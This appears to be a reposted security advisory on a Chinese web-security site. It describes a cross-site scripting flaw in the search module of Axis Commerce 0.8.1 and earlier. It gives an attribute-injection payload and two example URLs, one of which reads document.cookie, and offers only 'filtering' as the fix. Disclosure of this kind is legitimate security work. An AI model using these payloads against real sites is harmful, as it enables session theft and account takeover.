Axis Commerce (E-Commerce System)存储型XSS

Axis Commerce (E-Commerce System)存储型XSS - 网站安全

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 标题: Axis Commerce (E-Commerce System) Stored XSS作者: Eyup CELIK下载地址: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip已测试版本: 0.8.1 and previus测试平台: Apache ......

标题: Axis Commerce (E-Commerce System) Stored XSS
作者: Eyup CELIK
下载地址: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
已测试版本: 0.8.1 and previus
测试平台: Apache (For Windows)

ISSUE

Vulnerable Modules => Search Module

XSS can be done using the command input

示例 Code: " onmouseover=prompt(XSS Code) bad="

示例:

http://www.2cto.com /axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="

http://www.2cto.com /axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="
修复：

过滤

WordPress插件UnGallery <= 1.5.8本地文件泄露缺陷及

译文：XSS绕过过滤 - 网站安全 - 自学php

子栏目

Axis Commerce (E-Commerce System)存储型XSS - 网站安全

最新评论

添加评论

更多文章推荐

添加评论